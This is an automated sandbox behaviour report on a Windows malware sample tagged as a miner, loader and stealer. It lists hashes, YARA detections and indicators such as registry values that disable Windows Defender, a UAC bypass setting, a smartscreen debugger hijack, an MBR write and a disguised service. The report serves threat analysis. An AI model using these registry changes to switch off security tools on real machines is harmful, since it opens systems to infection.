Analysis
-
max time kernel
150s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
26/03/2025, 16:42
Behavioral task
behavioral1
Sample
2025-03-26_bac9ac1ac04e6924c24c39be9ffff843_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-03-26_bac9ac1ac04e6924c24c39be9ffff843_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-26_bac9ac1ac04e6924c24c39be9ffff843_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe
-
Size
15.7MB
-
MD5
bac9ac1ac04e6924c24c39be9ffff843
-
SHA1
8fa5b362a62214dcf8ffd638e203c4d80d3d69af
-
SHA256
e16d6d00f16967e549e742e67b355d725641269b6cd6fd6a6e687046ab220e75
-
SHA512
036f144e7d364d00361353aea19fe1c6504b0ea89ce7db3c363b78a88cd756e5bca91b2d27583aff2ff019d9817016deed4d214317e55e9697890db60d81f679
-
SSDEEP
196608:5AdCNbhcF1WKW6whfOjGvAWHMMH1OAY8PyedZLOOW7j7XlivZqOXmtubmxl5pprz:5AdghcflGvF0t7iZqptmmH5Hn
Malware Config
Signatures
-
Contains code to disable Windows Defender 3 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/files/0x0006000000016edc-12.dat disable_win_def behavioral1/files/0x000600000001707f-31.dat disable_win_def behavioral1/files/0x0007000000016edc-58.dat disable_win_def -
Disables service(s) 3 TTPs
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 28 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableInformationProtectionControl = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIntrusionPreventionSystem = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" reg.exe -
Modifies Windows Defender notification settings 3 TTPs 16 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe -
Modifies security service 2 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\DisableAntiSpyware = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\DisableAntiSpyware = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
XMRig Miner payload 3 IoCs
resource yara_rule behavioral1/memory/2396-16-0x0000000000400000-0x00000000013B9000-memory.dmp xmrig behavioral1/files/0x0007000000016890-194.dat family_xmrig behavioral1/files/0x0007000000016890-194.dat xmrig -
Xmrig family
-
pid Process 2984 powershell.exe 1588 powershell.exe 2884 powershell.exe 1696 powershell.exe 2236 powershell.exe 964 powershell.exe 1692 PowerShell.exe 1208 powershell.exe 2240 powershell.exe 2516 powershell.exe 2780 powershell.exe 2628 powershell.exe 1944 powershell.exe 1236 powershell.exe 2872 powershell.exe 1504 powershell.exe 1340 powershell.exe 1992 powershell.exe 1916 powershell.exe 1556 powershell.exe 2876 powershell.exe 2480 powershell.exe 2416 powershell.exe 848 powershell.exe 2652 powershell.exe 1740 powershell.exe 2904 powershell.exe 2660 powershell.exe 772 powershell.exe 2924 powershell.exe 1484 powershell.exe 2636 powershell.exe -
Disables Task Manager via registry modification
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe\Debugger = "%windir%\\System32\\taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe\Debugger = "%windir%\\System32\\taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe reg.exe -
Modifies Windows Firewall 2 TTPs 18 IoCs
pid Process 1252 netsh.exe 1704 netsh.exe 1696 netsh.exe 1684 netsh.exe 2980 netsh.exe 1804 netsh.exe 1596 netsh.exe 1936 netsh.exe 2040 netsh.exe 824 netsh.exe 2768 netsh.exe 676 netsh.exe 3020 netsh.exe 2648 netsh.exe 1380 netsh.exe 1192 netsh.exe 1796 netsh.exe 2972 netsh.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 2576 takeown.exe 2216 icacls.exe -
Sets service image path in registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Intel(R) Utiliti\ImagePath = "\"C:\\ProgramData\\IntelSvc.exe\" w -sid 1" reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Intel(R) Utiliti\ImagePath = "\"C:\\ProgramData\\IntelSvc.exe\" w -sid 1" reg.exe -
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Control Panel\International\Geo\Nation IntelSvc.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini attrib.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TeamViewer_Service.lnk powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2060 IntelSvc.exe 2380 IntelSvc.exe -
Loads dropped DLL 3 IoCs
pid Process 1740 powershell.exe 2716 powershell.exe 1848 powershell.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 2576 takeown.exe 2216 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 2 IoCs
description ioc Process File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini attrib.exe File opened for modification C:\Users\Public\desktop.ini attrib.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Modifies Security services 2 TTPs 20 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4" reg.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 IntelSvc.exe -
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\en\In.avi cmd.exe File created C:\Windows\SysWOW64\en\Ri.avi cmd.exe File opened for modification C:\Windows\SysWOW64\en\AuthFWSnapIn.Resources.dll attrib.exe File created C:\Windows\SysWOW64\en\sc.avi cmd.exe File created C:\Windows\SysWOW64\RuntimeBroker.exe cmd.exe File opened for modification C:\Windows\SysWOW64\RuntimeBroker.exe cmd.exe File opened for modification C:\Windows\SysWOW64\en\Au.avi cmd.exe File opened for modification C:\Windows\SysWOW64\en\Ri.avi cmd.exe File created C:\Windows\SysWOW64\en\In.avi cmd.exe File created C:\Windows\SysWOW64\en\Sy.avi cmd.exe File opened for modification C:\Windows\SysWOW64\en\AuthFWWizFwk.Resources.dll attrib.exe File opened for modification C:\Windows\SysWOW64\en\sc.avi cmd.exe File created C:\Windows\SysWOW64\en\cm.avi cmd.exe File opened for modification C:\Windows\SysWOW64\en\cm.avi cmd.exe File opened for modification C:\Windows\SysWOW64\en\Sy.avi cmd.exe File created C:\Windows\SysWOW64\en\Au.avi cmd.exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 2648 tasklist.exe 2044 tasklist.exe 1568 tasklist.exe 2136 tasklist.exe 2844 tasklist.exe -
resource yara_rule behavioral1/files/0x000700000001660e-196.dat upx -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\L2cache attrib.exe -
Launches sc.exe 12 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2920 sc.exe 2152 sc.exe 2332 sc.exe 2316 sc.exe 2884 sc.exe 2732 sc.exe 2100 sc.exe 2624 sc.exe 2976 sc.exe 2828 sc.exe 2744 sc.exe 2908 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-26_bac9ac1ac04e6924c24c39be9ffff843_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 11 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1636 PING.EXE 1728 PING.EXE 1252 PING.EXE 3044 PING.EXE 2856 PING.EXE 2600 PING.EXE 2112 PING.EXE 1156 PING.EXE 1864 PING.EXE 1044 PING.EXE 2932 PING.EXE -
Checks processor information in registry 2 TTPs 10 IoCs
